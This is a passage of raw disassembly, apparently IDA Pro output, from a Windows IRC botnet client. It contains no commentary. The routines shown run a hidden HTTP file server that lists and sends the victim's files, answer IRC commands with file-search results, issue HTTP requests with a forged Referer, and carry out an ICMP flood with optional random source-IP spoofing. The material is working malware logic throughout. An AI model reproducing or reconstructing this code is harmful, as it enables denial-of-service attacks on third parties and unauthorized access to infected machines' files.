lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Str
call sub_40573D
lea eax, [ebp+Dst]
push eax ; Format
lea eax, [ebp+var_53C]
push eax ; Dest
call _sprintf
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_404F4F
; ---------------------------------------------------------------------------
loc_404EF4: ; CODE XREF: sub_404D4E+14F�j
push ebx
loc_404EF5: ; CODE XREF: sub_404D4E+126�j
call dword_42EC48 ; closesocket
jmp loc_404FF7
; ---------------------------------------------------------------------------
loc_404F00: ; CODE XREF: sub_404D4E+14A�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+Dest]
push 80000000h
push eax
call ds:dword_41B05C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_404F4F
lea eax, [ebp+Dest]
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:dword_41B0A4 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_41B050 ; CloseHandle
loc_404F4F: ; CODE XREF: sub_404D4E+1A4�j
; sub_404D4E+1CF�j
mov esi, [ebp+arg_10]
lea eax, [ebp+Source]
push esi
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_411C3A
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_430544[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_404BCC
push edi
push edi
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_430554[ecx], eax
jz short loc_404FC9
loc_404FB7: ; CODE XREF: sub_404D4E+279�j
cmp [ebp+var_318], edi
jnz short loc_404FF7
push 5
call ds:dword_41B048 ; Sleep
jmp short loc_404FB7
; ---------------------------------------------------------------------------
loc_404FC9: ; CODE XREF: sub_404D4E+267�j
push ebx
call dword_42EC48 ; closesocket
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_402D63
add esp, 10h
loc_404FF7: ; CODE XREF: sub_404D4E+1AD�j
; sub_404D4E+26F�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_404D4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404FFE(char *Str,int,int,char *Source)
sub_404FFE proc near ; CODE XREF: sub_404BCC+159�p
; sub_409557+3E5B�p
Dst = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
Str1 = byte ptr -35Ch
var_248 = byte ptr -248h
Dest = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call _memset
mov edi, [ebp+Str]
push offset asc_42002C ; "\n"
push edi ; Str
call _strtok
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_40505D
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_40515A
; ---------------------------------------------------------------------------
loc_40505D: ; CODE XREF: sub_404FFE+3A�j
cmp [ebp+Source], ebx
push edi ; Str
jz loc_405140
call _strlen
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
push edi ; Str
call _strlen
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40515A
; ---------------------------------------------------------------------------
loc_405140: ; CODE XREF: sub_404FFE+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_40515A: ; CODE XREF: sub_404FFE+5A�j
; sub_404FFE+140�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
cmp [ebp+Source], ebx
jz short loc_4051F2
push [ebp+Source] ; Str
call _strlen
cmp eax, 2
pop ecx
jbe short loc_4051F2
push [ebp+Source] ; Str
call _strlen
sub eax, 3
pop ecx
jz short loc_4051A6
loc_40519A: ; CODE XREF: sub_404FFE+1A6�j
mov ecx, [ebp+Source]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_4051A6
dec eax
jnz short loc_40519A
loc_4051A6: ; CODE XREF: sub_404FFE+19A�j
; sub_404FFE+1A3�j
inc eax
push eax ; Count
lea eax, [ebp+Dst]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Dst]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
loc_4051F2: ; CODE XREF: sub_404FFE+17E�j
; sub_404FFE+18C�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_41B0BC ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+Str], eax
push ecx
push eax
call ds:dword_41B0B8 ; FindNextFileA
test eax, eax
jz loc_4055E3
mov edi, 1FFh
loc_40521E: ; CODE XREF: sub_404FFE+5DF�j
cmp [ebp+var_388], ebx
jz loc_4055CB
lea eax, [ebp+Str1]
push offset a__ ; ".."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4055CB
lea eax, [ebp+Str1]
push offset a__0 ; "."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4055CB
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_41B0B4 ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_41B0B0 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_405293
mov ecx, offset aAm ; "AM"
loc_405293: ; CODE XREF: sub_404FFE+28E�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_40529F
sub eax, 0Ch
loc_40529F: ; CODE XREF: sub_404FFE+29C�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+Dest]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax ; Dest
call _sprintf
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_40544C
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_405320
lea eax, [ebp+Str1]
push eax
push offset aS_3 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 28h
jmp loc_40559C
; ---------------------------------------------------------------------------
loc_405320: ; CODE XREF: sub_404FFE+2DB�j
cmp [ebp+Source], ebx
jz loc_40540A
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS_2 ; "%s%s/"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Eh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_4053C0
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4053C5
; ---------------------------------------------------------------------------
loc_4053C0: ; CODE XREF: sub_404FFE+3B9�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4053C5: ; CODE XREF: sub_404FFE+3C0�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_40558D
; ---------------------------------------------------------------------------
loc_40540A: ; CODE XREF: sub_404FFE+325�j
lea eax, [ebp+Str1]
push eax
push offset aS_3 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_405437: ; CODE XREF: sub_404FFE+476�j
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 24h
jmp loc_40559C
; ---------------------------------------------------------------------------
loc_40544C: ; CODE XREF: sub_404FFE+2CF�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_405476
push ebx
push [ebp+var_368]
call sub_403A49
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_405437
; ---------------------------------------------------------------------------
loc_405476: ; CODE XREF: sub_404FFE+454�j
cmp [ebp+Source], ebx
jz loc_405576
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS ; "%s%s"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Fh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_405516
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_40551B
; ---------------------------------------------------------------------------
loc_405516: ; CODE XREF: sub_404FFE+50F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_40551B: ; CODE XREF: sub_404FFE+516�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
jmp short loc_40559C
; ---------------------------------------------------------------------------
loc_405576: ; CODE XREF: sub_404FFE+47B�j
push [ebp+var_368]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi ; Count
loc_40558D: ; CODE XREF: sub_404FFE+407�j
lea eax, [ebp+var_248]
push eax ; Dest
call __snprintf
add esp, 18h
loc_40559C: ; CODE XREF: sub_404FFE+31D�j
; sub_404FFE+449�j ...
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
cmp [ebp+arg_8], ebx
jz short loc_4055CB
push 7D0h
call ds:dword_41B048 ; Sleep
loc_4055CB: ; CODE XREF: sub_404FFE+226�j
; sub_404FFE+241�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+Str]
call ds:dword_41B0B8 ; FindNextFileA
test eax, eax
jnz loc_40521E
loc_4055E3: ; CODE XREF: sub_404FFE+215�j
push [ebp+Str]
call ds:dword_41B0AC ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_405626
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_403A49
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_403A49
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_40565A
; ---------------------------------------------------------------------------
loc_405626: ; CODE XREF: sub_404FFE+5F1�j
cmp [ebp+Source], ebx
jz short loc_405640
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_40565A
; ---------------------------------------------------------------------------
loc_405640: ; CODE XREF: sub_404FFE+62B�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax ; Dest
call _sprintf
add esp, 10h
loc_40565A: ; CODE XREF: sub_404FFE+626�j
; sub_404FFE+640�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_42EC00 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_404FFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405680 proc near ; CODE XREF: sub_404BCC+13B�p
Dst = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_41B05C ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_405738
push esi
push ebx
call ds:dword_41B0A4 ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_405731
loc_4056C5: ; CODE XREF: sub_405680+AF�j
push 400h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_4056E2
mov edi, [ebp+arg_4]
loc_4056E2: ; CODE XREF: sub_405680+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_41B0C0 ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Dst]
push edi
push eax
push ebx
call ds:dword_41B04C ; ReadFile
push esi
lea eax, [ebp+Dst]
push edi
push eax
push [ebp+arg_0]
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40572C
call dword_42EB50 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_405731
xor eax, eax
loc_40572C: ; CODE XREF: sub_405680+9B�j
sub [ebp+arg_4], eax
jnz short loc_4056C5
loc_405731: ; CODE XREF: sub_405680+43�j
; sub_405680+A8�j
push ebx
call ds:dword_41B050 ; CloseHandle
loc_405738: ; CODE XREF: sub_405680+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_405680 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40573D(char *Str)
sub_40573D proc near ; CODE XREF: sub_404D4E+17C�p
Str = dword ptr 4
push esi
push edi
mov edi, [esp+8+Str]
xor esi, esi
push edi ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_405766
loc_405750: ; CODE XREF: sub_40573D+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_40575A
mov byte ptr [esi+edi], 2Fh
loc_40575A: ; CODE XREF: sub_40573D+17�j
push edi ; Str
inc esi
call _strlen
cmp esi, eax
pop ecx
jb short loc_405750
loc_405766: ; CODE XREF: sub_40573D+11�j
mov eax, edi
pop edi
pop esi
retn
sub_40573D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40576B proc near ; CODE XREF: sub_409557+2461�p
var_4A0 = byte ptr -4A0h
Dest = byte ptr -310h
Str = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_42EB38 ; WSAStartup
push 6
push 1
push 2
call dword_42EC30 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_14]
call dword_42EBB4 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_4082EB
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_405848
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_4057E4
mov eax, offset byte_428D64
loc_4057E4: ; CODE XREF: sub_40576B+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+Str]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Str]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push ebx
call dword_42EC00 ; send
push esi ; Size
lea eax, [ebp+Str]
push edi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+Str]
push edi
push esi
push eax
push ebx
call dword_42EBCC ; recv
pop esi
loc_405848: ; CODE XREF: sub_40576B+6B�j
push ebx
call dword_42EC48 ; closesocket
call dword_42EB20 ; WSACleanup
lea eax, [ebp+Str]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_405888
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
loc_405888: ; CODE XREF: sub_40576B+102�j
pop edi
pop ebx
leave
retn
sub_40576B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40588C proc near ; DATA XREF: sub_409557+3454�o
Dest = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_42EC30 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_405927
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax ; Dest
call _sprintf
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_40590A
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_405E64
add esp, 14h
loc_40590A: ; CODE XREF: sub_40588C+5C�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_38]
call sub_411F56
pop ecx
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_405927: ; CODE XREF: sub_40588C+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_42EB94 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40599E
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_405981
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_405E64
add esp, 14h
loc_405981: ; CODE XREF: sub_40588C+D3�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_38]
call sub_411F56
pop ecx
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_40599E: ; CODE XREF: sub_40588C+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_42EBF0 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_405A05
lea eax, [ebp+Dest]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax ; Dest
call _sprintf
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_4059E8
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_405E64
add esp, 14h
loc_4059E8: ; CODE XREF: sub_40588C+13A�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_38]
call sub_411F56
pop ecx
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_405A05: ; CODE XREF: sub_40588C+122�j
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_42EBB4 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_42EBF0 ; inet_addr
mov esi, ds:dword_41B078
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_405A43: ; CODE XREF: sub_40588C+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_405BEE
push 41Ch
mov byte_42E670, 45h
call dword_42EBB4 ; htons
cmp [ebp+var_2C], edi
mov word_42E672, ax
mov word_42E674, bx
mov word_42E676, di
mov byte_42E678, 80h
mov byte_42E679, bl
mov word_42E67A, di
jz short loc_405AC9
call _rand
mov ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
push 1
mov dword_42E67C, ebx
pop ebx
jmp short loc_405AE1
; ---------------------------------------------------------------------------
loc_405AC9: ; CODE XREF: sub_40588C+20B�j
push [ebp+var_1BC]
call sub_408401
pop ecx
push eax
call dword_42EBF0 ; inet_addr
mov dword_42E67C, eax
loc_405AE1: ; CODE XREF: sub_40588C+23B�j
mov eax, [ebp+var_18]
mov dword_42E680, eax
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_42E684, dl
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_42E685, dl
call _rand
cdq
mov ecx, 0F0h
push 400h ; Size
idiv ecx
mov word_42E686, di
mov word_42E68A, bx
inc edx
mov word_42E688, dx
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx ; Val
push offset dword_42E68C ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 10h
push eax
push edi
push 41Ch
push offset byte_42E670
push [ebp+var_4]
call dword_42EC14 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_405B79
inc [ebp+arg_0]
jmp loc_405A43
; ---------------------------------------------------------------------------
loc_405B79: ; CODE XREF: sub_40588C+2E3�j
push [ebp+var_4]
call dword_42EC48 ; closesocket
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_405BD1
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_405E64
add esp, 14h
loc_405BD1: ; CODE XREF: sub_40588C+323�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_38]
call sub_411F56
pop ecx
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_405BEE: ; CODE XREF: sub_40588C+1C8�j
push [ebp+var_4]
call dword_42EC48 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+Dest]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_405C56
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_405E64
add esp, 14h
loc_405C56: ; CODE XREF: sub_40588C+3A8�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_38]
call sub_411F56
pop ecx
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
sub_40588C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C73 proc near ; DATA XREF: WinMain(x,x,x,x)+4B5�o
